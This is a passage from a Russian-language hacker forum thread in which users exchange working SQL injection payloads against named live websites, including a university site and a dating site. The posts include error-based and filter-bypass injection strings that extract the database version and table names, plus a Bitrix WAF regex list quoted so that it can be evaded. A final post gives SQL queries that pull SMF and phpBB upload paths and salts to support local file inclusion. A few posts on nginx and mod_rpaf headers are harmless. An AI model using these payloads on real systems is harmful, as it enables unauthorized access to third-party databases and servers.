Старый 12.07.2012, 22:35   #2171
Pirotexnik
 
Аватар для Pirotexnik
 
Регистрация: 16.05.2012
Сообщений: 32
Репутация: -2
По умолчанию

Спасибо. Пичаль.
__________________
h4q 4ll w0rld
Pirotexnik вне форума   Ответить с цитированием
Старый 13.07.2012, 00:54   #2172
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

Untitled,
у тебя на сервере апач висит на 80 порту, а траф на него идёт с другого сервера. чтобы видеть реальные ip юзеров нужно поставить mod_rpaf и добавить ип того сервера (123.12.1.123) в конфиг rpaf'а
12309 вне форума   Ответить с цитированием
Старый 13.07.2012, 01:01   #2173
Kribrum
 
Регистрация: 14.06.2012
Сообщений: 13
Репутация: 2
По умолчанию

12309,
Я могу ошибиться, но это может оказаться неверным решением, если система разбита на несколько серверов например (frontend)/(backend). На front'e - статика и картинки, на back'e - динамика. Обращения юзеров идут на front, а там стоит какой-нить nginx, у которого просто указан proxy_pass на back'end. В таком случае rpaf ничего нужного не покажет. Или нет?

Последний раз редактировалось Kribrum; 13.07.2012 в 01:02.. Причина: сорри, невнимательно прочитал предыдущую страницу.
Kribrum вне форума   Ответить с цитированием
Старый 13.07.2012, 14:40   #2174
kingbeef
 
Регистрация: 28.10.2011
Сообщений: 17
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pirotexnik Посмотреть сообщение
http://www.bsu.edu.ru/mc/faculty.php?id=1&type=8+and(/*+++select+select+++*/+select+1+from(select+count(*),concat((select+@@ve rsion),floor(rand(0)*2))x+from+information_schema. tables+group+by+x)a)--+g
Фильтр все равно.
kingbeef вне форума   Ответить с цитированием
Старый 13.07.2012, 19:35   #2175
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

Цитата:
Сообщение от kingbeef Посмотреть сообщение
Фильтр все равно.
?id=1&type=8,information_schema.tables+where+table _schema+not+like+'info%'+group+by+concat(table_nam e,rand(0)|0)+having+min(0)+limit+0,1+--+-

?type=8+union%23%0aselect+1,2,3,table_name,5,6,7,8 ,9,10/*&id=*/from+information_schema.tables

Последний раз редактировалось BlackFan; 13.07.2012 в 20:20..
BlackFan вне форума   Ответить с цитированием
Старый 13.07.2012, 19:44   #2176
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

> а там стоит какой-нить nginx, у которого просто указан proxy_pass на back'end

надо попробовать. думаю, энжынкс по дефолту передаёт хедер x-forwarded-for.
рпаф еще определённый хедер читает, его тоже можно в конфиге указать. например, x-real-ip вместо x-forwarded-for
12309 вне форума   Ответить с цитированием
Старый 13.07.2012, 20:07   #2177
Pirotexnik
 
Аватар для Pirotexnik
 
Регистрация: 16.05.2012
Сообщений: 32
Репутация: -2
По умолчанию

2BlackFan, ай хорош. Особенно первый вариант.
Как-то забыл я, что можно вообще без юнионов обойтись)
__________________
h4q 4ll w0rld
Pirotexnik вне форума   Ответить с цитированием
Старый 13.07.2012, 21:40   #2178
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
Сообщение от BlackFan Посмотреть сообщение
?id=1&type=8,information_schema.tables+where+table _schema+not+like+'info%'+group+by+concat(table_nam e,rand(0)|0)+having+min(0)+limit+0,1+--+-
Шикарно, не сообразил.
К слову, скрипт работает через битриксовые файлы (от туда и WAF, скорее всего).

Вдогонку - сам фильтр:

PHP код:
        $sql_space "(?:[\\x00-\\x20\(\)\'\"\`]|(?:\\/\\*.*?\\*\\/)|(?:--.*?[\\n\\r])|(\\/\\*!)|(\\*\\/))+";
        if(!
$this->_sql_filters)
        {
            
$this->_sql_filters = array(
                
"/(uni)(on{$sql_space}.+{$sql_space}sel)(ect)/is" => "\\1{$char}\\2{$char}\\3",
                
"/(uni)(on{$sql_space}sel)(ect)/is" => "\\1{$char}\\2{$char}\\3",

                
"/(sel)(ect{$sql_space}.+{$sql_space}fr)(om)/is" => "\\1{$char}\\2{$char}\\3",
                
"/(fr)(om{$sql_space}.+{$sql_space}wh)(ere)/is" => "\\1{$char}\\2{$char}\\3",

                
"/(alt)(er)({$sql_space})(database|table|function|procedure|server|event|view|index)/is" => "\\1{$char}\\2\\3\\4",
                
"/(cre)(ate)({$sql_space})(database|table|function|procedure|server|event|view|index)/is" => "\\1{$char}\\2\\3\\4",
                
"/(dr)(op)({$sql_space})(database|table|function|procedure|server|event|view|index)/is" => "\\1{$char}\\2\\3\\4",

                
"/(upd)(ate{$sql_space}.+{$sql_space}se)(t)/is" => "\\1{$char}\\2{$char}\\3",
                
"/(ins)(ert{$sql_space}.+{$sql_space}val)(ue)/is" => "\\1{$char}\\2{$char}\\3",
                
"/(ins)(ert{$sql_space}.+{$sql_space}se)(t)/is" => "\\1{$char}\\2{$char}\\3",
                
"/(i)(nto{$sql_space}out)(file)/is" => "\\1{$char}\\2{$char}\\3",
                
"/(i)(nto{$sql_space}dump)(file)/is" => "\\1{$char}\\2{$char}\\3",

                
"/(ins)(ert{$sql_space}.+{$sql_space}sele)(ct)/is" => "\\1{$char}\\2{$char}\\3",
                
"/(ins)(ert{$sql_space}in)(to)/is" => "\\1{$char}\\2{$char}\\3",
                
"/(ins)(ert{$sql_space}.+{$sql_space}in)(to)/is" => "\\1{$char}\\2{$char}\\3",


                
"/(load_)(file\\()/is" => "\\1{$char}\\2",

                
"/({$sql_space}[sx]p)(_\w+\()/" => "\\1{$char}\\2",

                
"/(ex)(ec\()/"=>"\\1{$char}\\2",

                
"/(fr)(om.+lim)(it)/is" => "\\1{$char}\\2{$char}\\3",

                
"/(ben)(chmark\\()/is" => "\\1{$char}\\2",
                
"/(sl)(eep\\()/is" => "\\1{$char}\\2",
                
"/(us)(er\\()/is" => "\\1{$char}\\2",
                
"/(ver)(sion\\()/is" => "\\1{$char}\\2",
                
"/(dat)(abase\\()/is" => "\\1{$char}\\2",
                
"/(sche)(ma\\()/is" => "\\1{$char}\\2",
                
"/(sub)(string\\()/is" => "\\1{$char}\\2",
            ); 

Последний раз редактировалось Untitled; 13.07.2012 в 23:57..
Untitled вне форума   Ответить с цитированием
Старый 19.07.2012, 17:34   #2179
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

http://www.dating21.com/matrimonials/index.asp?ctry=Malaysia&id=149&st=Selangor&ct=Kual a%20Lumpur%27+or+1=@@version--

а вот вывести данные из любой таблицы не получается
durito вне форума   Ответить с цитированием
Старый 20.07.2012, 21:31   #2180
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Движки часто скрывают путь к залитым файлам и отдают их содержимое через скрипты, что очень неудобно при LFI.

SMF 2.x (по-моему, только 2ая ветка):
Код:
/%ATTACHMENTS_PATH%/%ATTACH_ID%_%FILE_HASH%
PHP код:
$file_hash sha1(md5($filename time()) . mt_rand()); 
ATTACH_ID берется, очевидно, из ссылки, FILE_HASH нужно выдергивать из базы:
Код:
SELECT+file_hash+FROM+smf_attachments+WHERE+id_attach=ATTACH_ID+LIMIT+0,1
ATTACHMENTS_PATH
Код:
SELECT+value+FROM+smf_settings+WHERE+variable=0x6174746163686d656e7455706c6f6164446972+LIMIT+0,1
По умолчанию: /attachments/. Также там может быть несколько путей, тогда надо дополнительно вытаскивать id_folder из smf_attachments.

В 1.х ветке (во всех ли?) аватарка загружалась просто как:
Код:
/%ATTACHMENTS_PATH%/avatar_%USER_ID%.jpg

phpBB 3.x

Код:
/%AVATAR_PATH%/%SALT%_%USER_ID%.jpg
SALT нужно выдергивать из базы:
Код:
SELECT+config_value+FROM+phpbb_config+WHERE+config_name='avatar_salt'+LIMIT+0,1
AVATAR_PATH:
Код:
SELECT+config_value+FROM+phpbb_config+WHERE+config_name='avatar_path'+LIMIT+0,1
По умолчанию: /images/avatars/upload/

С аттачами аналогично, подробнее в functions_upload.php, функция clean_filename().
Untitled вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot